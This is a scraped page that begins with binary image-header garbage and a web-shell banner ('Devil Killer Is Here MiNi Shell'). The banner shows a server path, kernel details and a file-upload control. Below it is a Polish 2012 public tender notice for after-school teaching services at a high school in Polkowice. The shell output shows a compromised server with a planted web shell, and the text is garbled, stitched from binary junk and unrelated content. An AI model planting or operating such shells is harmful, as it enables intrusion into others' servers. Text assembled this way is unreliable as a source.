JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120827/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120827/316640-N-2012.html

<p class="kh_header"><b>Polkowice: Świadczenie usług szkolnictwa  w Liceum Ogólnokształcącym w Polkowicach  w ramach projektu: Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach</b><br>
<b>Numer ogłoszenia: 316640 - 2012; data zamieszczenia: 27.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Polkowicki , ul. Górna 2, 59-100 Polkowice, woj. dolnośląskie, tel. 076 746 15 00, faks 076 746 15 01.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług szkolnictwa  w Liceum Ogólnokształcącym w Polkowicach  w ramach projektu: Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotowe zamówienie jest realizowane w ramach Projektu pn. Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach - na podstawie umowy nr UDA-POKL.09.01.02-02-153-11-00 z dnia 28 maja 2012 r. w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji  w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.

Przedmiotem zamówienia są: Usługi edukacyjne i doradztwa zawodowego obejmujące prowadzenie zajęć pozalekcyjnych (dydaktyczno - wyrównawczych oraz rozwijających zainteresowania) dla uczestników Projektu Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach - na podstawie umowy nr UDA-POKL.09.01.02-02-153-11-00 z dnia 28 maja 2012 r., w roku szkolnym 2012-2013 i 2013-2014. W ramach niniejszego zamówienia realizowane będą następujące zajęcia, stanowiące odrębne zadania:

ZADANIE 1 - warsztaty uczenia się pod nazwą Będę mistrzem; zajęcia umożliwiające poznanie metod i technik uczenia się, rodzajów inteligencji, zwracające uwagę na rolę motywacji, wiary we własne możliwości, wytrwałość i konsekwencję w procesie uczenia się. 2 prowadzących; 12 grup, w każdej po 19 godzin zegarowych. Łącznie 168 godzin zegarowych na prowadzącego (114 godziny w roku szkolnym 2012-2013 i 54 godziny w roku szkolnym 2013-2014).

ZADANIE 2 - doradca zawodowy - warsztaty uczenia się pod nazwą Będę mistrzem; zajęcia doskonalące umiejętność wyboru i planowania swojej drogi zawodowej, podnoszące samoocenę. 1 prowadzący; 12 grup, w każdej po 8 godzin zegarowych. Łącznie 144 godziny zegarowe (96 godzin w roku szkolnym 2012-2013 i 48 godzin w roku szkolnym 2013-2014).

ZADANIE 3 - zajęcia pozalekcyjne rozwijające zainteresowania przyrodniczo-ekologiczne pod nazwą Aktywni w środowisku; zajęcia kształtujące umiejętność interdyscyplinarnego myślenia, dostrzegania zależności między stanem środowiska   i społeczeństw, wykorzystania TIK do prezentacji wyników obserwacji i doświadczeń. Przygotowujące do konkursów i studiów na kierunkach przyrodniczych. 2 prowadzących; 2 grupy po 2 godziny w tygodniu. Łącznie 66 godzin dydaktycznych na prowadzącego (34 godziny w roku szkolnym 2012-2013 i 32 godziny w roku szkolnym 2013-2014).

ZADANIE 4 - zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki pod nazwą Matematyka dla wszystkich; zajęcia ukierunkowane na rozwój kluczowych kompetencji matematycznych uczniów, pokonywanie barier w kontynuowaniu kształcenia matematyczno-przyrodniczego i technicznego. Zajęcia o charakterze wyrównawczym i przygotowującym do matury. 2 prowadzących; 2 grupy po 2 godziny w tygodniu. Łącznie   94 godziny dydaktyczne na prowadzącego (47 godzin w roku szkolnym 2012-2013 i 47 godzin w roku szkolnym 2013-2014).

ZADANIE 5 - zajęcia pozalekcyjne rozwijające zainteresowania z matematyki pod nazwą Matematyka dla wszystkich; zajęcia ukierunkowane na rozwój kluczowych kompetencji matematycznych uczniów, pokonywanie barier w kontynuowaniu kształcenia matematyczno-przyrodniczego i technicznego, przygotowujące do konkursów. Zajęcia o charakterze wyrównawczym i przygotowującym do matury. 2 prowadzących; 2 grupy po  2 godziny w tygodniu. Łącznie 94 godziny dydaktyczne na prowadzącego (47 godzin w roku szkolnym 2012-2013 i 47 godzin w roku szkolnym 2013-2014).

ZADANIE 6 - zajęcia pozalekcyjne rozwijające zainteresowania teatralne pod nazwą Teatr Anty dotum; zajęcia z improwizacji teatralnej, pracy nad świadomością ciała, plastyki ruchu, dykcji, choreografii i tańca. 1 grupa - 4 godziny dydaktyczne w tygodniu. Łącznie 200 godzin dydaktycznych (100 godzin w roku szkolnym 2012-2013 i 100 godzin  w roku szkolnym 2013-2014).

ZADANIE 7 - zajęcia pozalekcyjne z języka angielskiego pod nazwą Koło języka angielskiego; zajęcia rozwijające sprawności językowe, poszerzające wiedzę z zakresu struktur leksykalno-gramatycznych, przygotowujące do matury. 2 prowadzących; 2 grupy po 2 godziny w tygodniu. Łącznie 94 godziny dydaktyczne na prowadzącego (47 godzin w roku szkolnym 2012-2013 i 47 godzin w roku szkolnym 2013-2014).

Zamawiający określając czas trwania zajęć jako godzina dydaktyczna ma na uwadze zapisy Rozporządzenia Ministra Edukacji Narodowej z dnia 17.11.2010 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach  i placówkach (Dz. U. z 2010 r. nr 228 poz. 1487) tj.: Godzina zajęć rozwijających uzdolnienia i zajęć dydaktyczno-wyrównawczych trwa 45 minut, a godzina zajęć specjalistycznych -                    - 60 minut. Szczegółowe informacje na temat kwalifikacji rodzaju zajęć znajdują się w w/w rozporządzeniu.
Zakres czynności nauczycieli prowadzących zajęcia obejmuje:

1.Realizację Projektu zgodnie z zapisami Umowy o dofinansowanie Projektu nr UDA-POKL.09.01.02-02-153-11-00, wnioskiem aplikacyjnym oraz harmonogramem realizacji Projektu.
2.Pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć.
3.Przygotowanie programu zajęć pozalekcyjnych i ich prowadzenie.
4.Zebranie deklaracji uczestnictwa młodzieży w projekcie oraz upoważnień do przetwarzania danych osobowych młodzieży od rodziców lub opiekunów prawnych (w sytuacji, gdy młodzież uczestnicząca w zajęciach jest niepełnoletnia).
5.Przetwarzanie danych osobowych młodzieży biorącej udział w Projekcie zgodnie    z obowiązującym prawem.
6.Prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach      oraz dokumentacji związanej z realizacją zajęć.
7.Udostępnianie dziennika zajęć Kadrze Zarządzającej Projektem oraz osobom kontrolującym realizację Projektu.
8.Monitoring działań przewidzianych w zadaniu oraz ich dokumentacja.
9.Sporządzanie raportu postępu uczniów (oprócz części 1, 2 i 7).
10.Przygotowanie sprawozdań.
11.Współpraca z Kadrą Zarządzającą Projektem.
12.Udział w spotkaniach roboczych zespołu projektowego.
13.Przekazanie całej dokumentacji wytworzonej w podczas zajęć Koordynatorowi    w okresie dwóch tygodni po zakończeniu zajęć, nie później niż w ostatnim dniu trwania umowy.
14.Odpracowanie zajęć, które nie odbyły się w terminach określonych  w harmonogramie   z powodu uzasadnionej nieobecności wszystkich uczniów biorących udział w zajęciach. Zleceniobiorca nie będzie rościł z tego tytułu dodatkowego wynagrodzenia.
15.Poddanie się kontroli planowej i nieplanowej zarówno ze strony Zleceniodawcy, jak też instytucji zewnętrznych.
16.Zapewnienie opieki i bezpieczeństwa uczestnikom zajęć.
17.Informowanie i zgłaszanie Kadrze Zarządzającej Projektem wszelkich nieprawidłowości, problemów związanych z realizacją niniejszej umowy.
18.Poinformowanie uczniów o realizacji zajęć w ramach Projektu Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz dbanie, aby w salach, w których odbywają się zajęcia związane z realizacją przedmiotowego Projektu zawsze znajdowały się materiały promocyjne dotyczące Projektu. Materiały promocyjne zostaną dostarczone przez Koordynatora.

Miejscem wykonania świadczenia będzie Zespół Szkół im. Narodów Zjednoczonej Europy w Polkowicach, ul. Skalników 6,  59-101 Polkowice..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca dysponuje min. jedną osobą (odpowiednio do części zamówienia), posiadającą następujące kwalifikacje i doświadczenie:
1) W przypadku składania oferty na ZADANIE 1 - warsztaty uczenia się pod nazwą Będę mistrzem:
- wykształcenie wyższe z uprawnieniami pedagogicznymi, 
- uprawnienia do prowadzenia zajęć uczenia się,
- znajomość kinezjologii edukacyjnej,
- doświadczenie w pracy z młodzieżą, 
- pełna zdolność do czynności prawnych oraz korzystanie w pełni z praw publicznych, niekaralność za przestępstwo popełnione umyślnie, nieposzlakowana opinia.

2) W przypadku składania oferty na ZADANIE 2 - doradca zawodowy - warsztaty uczenia się pod nazwą Będę mistrzem:
- wykształcenie wyższe w zakresie poradnictwa zawodowego i przedsiębiorczości, 
- nauczyciel min. mianowany, z min. 5 letnim stażem pracy w szkole ponadgimnazjalnej, 
- pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, niekaralność za przestępstwo popełnione umyślnie, nieposzlakowana opinia.

3) W przypadku składania oferty na ZADANIE 3 - zajęcia pozalekcyjne rozwijające zainteresowania przyrodniczo-ekologiczne pod nazwą Aktywni w środowisku:
- wykształcenie wyższe kierunkowe (biologiczne, chemiczne, geograficzne), 
- nauczyciel dyplomowany z min. 5 letnim stażem pracy w szkole, 
- doświadczenie w rozwijaniu zainteresowań przyrodniczo-ekologicznych, 
- pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, niekaralność za przestępstwo popełnione umyślnie, nieposzlakowana opinia.


4) W przypadku składania oferty na ZADANIE 4 - zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki pod nazwą Matematyka dla wszystkich:
- wykształcenie wyższe matematyczne, 
- nauczyciel min. kontraktowy, z min. 2 letnim stażem pracy w szkole ponadgimnazjalnej, 
- pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, niekaralność za przestępstwo popełnione umyślnie, nieposzlakowana opinia.

5) W przypadku składania oferty na ZADANIE 5 - zajęcia pozalekcyjne rozwijające zainteresowania z matematyki pod nazwą Matematyka dla wszystkich:
- wykształcenie wyższe matematyczne, 
- nauczyciel dyplomowany z min. 5 letnim stażem pracy w szkole ponadgimnazjalnej, 
- egzaminator maturalny z matematyki, 
- pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, niekaralność za przestępstwo popełnione umyślnie, nieposzlakowana opinia.

6) W przypadku składania oferty na ZADANIE 6 - prowadzący zajęcia pozalekcyjne rozwijające zainteresowania teatralne pod nazwą Teatr Anty dotum:
- wykształcenie kierunkowe - instruktor teatralny lub animator kultury, 
- doświadczenie w pracy z młodzieżą, 
- odpowiedzialność, kreatywność, zdolności organizacyjne, 
- pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, niekaralność za przestępstwo popełnione umyślnie, nieposzlakowana opinia.

7) W przypadku składania oferty na ZADANIE 7 - zajęcia pozalekcyjne z języka angielskiego pod nazwą Koło języka angielskiego: 
- wykształcenie wyższe - filologia angielska, 
- nauczyciel min. mianowany, z min. 5 letnim stażem pracy w szkole ponadgimnazjalnej, 
- egzaminator maturalny z języka angielskiego, 
- pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, niekaralność za przestępstwo popełnione umyślnie, nieposzlakowana opinia.

Na potwierdzenie powyższych wymogów Wykonawca przedłoży wykaz osób, w którym wskaże osobę/by (bądź siebie, jeżeli Wykonawca jest osobą fizyczną, która będzie realizowała  zamówienie), wskazując jednocześnie jej doświadczenie w wymaganym zakresie oraz złoży stosowne oświadczenie o treści zgodnej z załączoną do specyfikacji o posiadaniu przez tą osobę wymaganych kwalifikacji i umiejętności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Oświadczenie, że osoby skierowane do realizacji zamówienia posiadają odpowiednie kwalifikacje            i umiejętności - odpowiednio dla każdej z części, złożone zgodnie z treścią SIWZ.
b)	Pełnomocnictwo wystawione dla osoby składającej ofertę, podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty przez pełnomocnika.
c)	W przypadku składania oferty przez podmioty występujące wspólnie, do oferty musi być dołączony dokument ustanawiający przez Wykonawców chcących startować wspólnie wspólnego pełnomocnika.
d)	W przypadku składania oferty przez podmioty występujące wspólnie oświadczenia o spełnieniu warunków określonych w art. 22 ust.1 ustawy oraz o nie podleganiu wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy oraz dokumenty, o których mowa w pkt 1.2 i 1.3 muszą być złożone przez każdy podmiot. 
e)	Przedsiębiorcy występujący jako spółka cywilna zobowiązani są do załączenia umowy spółki cywilnej, celem ustalenia osób uprawnionych do reprezentowania spółki.
f)	W przypadku osób fizycznych zaleca się złożenie zaświadczenia o wpisie do ewidencji działalności gospodarczej zawierające wskazanie prowadzonej działalności gospodarczej. 
g)	Oświadczenia Wykonawcy zgodnie z załącznikiem nr 3 Formularza ofertowego.
h)	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów w zakresie wiedzy i doświadczenia, potencjału technicznego oraz osób zdolnych do wykonania zamówienia lub zdolnościach finansowych na okres korzystania z nich przy wykonywaniu zamówienia, w sytuacji określonej w art. 26 ust. 2b ustawy; w przypadku kiedy Wykonawca powoła się na wiedzę i doświadczenie innego podmiotu, oświadczenie tego podmiotu zawierać winno zobowiązanie do udziału w wykonywaniu części udzielanego zamówienia w zakresie udostępnionego Wykonawcy potencjału.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Warunki i zasady wprowadzenia zmian do przedmiotu zamówienia: 
Zmiany umowy mogą być dokonane przez Strony jedynie w formie pisemnej pod rygorem nieważności w sytuacji wystąpienia następujących okoliczności:
A.	Dopuszcza się możliwość poprawiania oczywistych omyłek w treści umowy.
B.	W przypadku zmiany przepisów prawa oświatowego w zakresie wymiaru godziny zajęć, dopuszcza się zmianę wymiaru godziny zajęć na wymiar wprowadzany przez przepisy prawa oświatowego. Zmiana wymiaru godziny zajęć nie będzie powodowała zmiany wynagrodzenia wskazanego w § 4 ust. 1 umowy.
C.	Jakiekolwiek zmiany w umowie wymagają formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://starostwo.polkowice.sisco.info/?id=3699<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe 
ul. Górna 2
59-100 Polkowice
pok. 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2012 godzina 12:00, miejsce: Starostwo Powiatowe w Polkowicach
kancelaria ogólna- parter
ul. Górna 2
59-100 Polkowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> warsztaty uczenia się pod nazwą Będę mistrzem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia umożliwiające poznanie metod i technik uczenia się, rodzajów inteligencji, zwracające uwagę na rolę motywacji, wiary we własne możliwości, wytrwałość i konsekwencję w procesie uczenia się. 2 prowadzących; 12 grup, w każdej po 19 godzin zegarowych. Łącznie 168 godzin zegarowych na prowadzącego (114 godziny w roku szkolnym 2012/2013 i 54 godziny w roku szkolnym 2013/2014).
Zamawiający określając czas trwania zajęć jako godzina dydaktyczna ma na uwadze zapisy Rozporządzenia Ministra Edukacji Narodowej z dnia 17.11.2010 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach  i placówkach (Dz. U. z 2010 r. nr 228 poz. 1487) tj.: Godzina zajęć rozwijających uzdolnienia  i zajęć dydaktyczno-wyrównawczych trwa 45 minut, a godzina zajęć specjalistycznych                   - 60 minut. Szczegółowe informacje na temat kwalifikacji rodzaju zajęć znajdują się w w/w rozporządzeniu.


Zakres czynności nauczycieli prowadzących zajęcia obejmuje:

1.	Realizację Projektu zgodnie z zapisami Umowy o dofinansowanie Projektu nr UDA-POKL.09.01.02-02-153/11-00, wnioskiem aplikacyjnym oraz harmonogramem realizacji Projektu.
2.	Pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć.
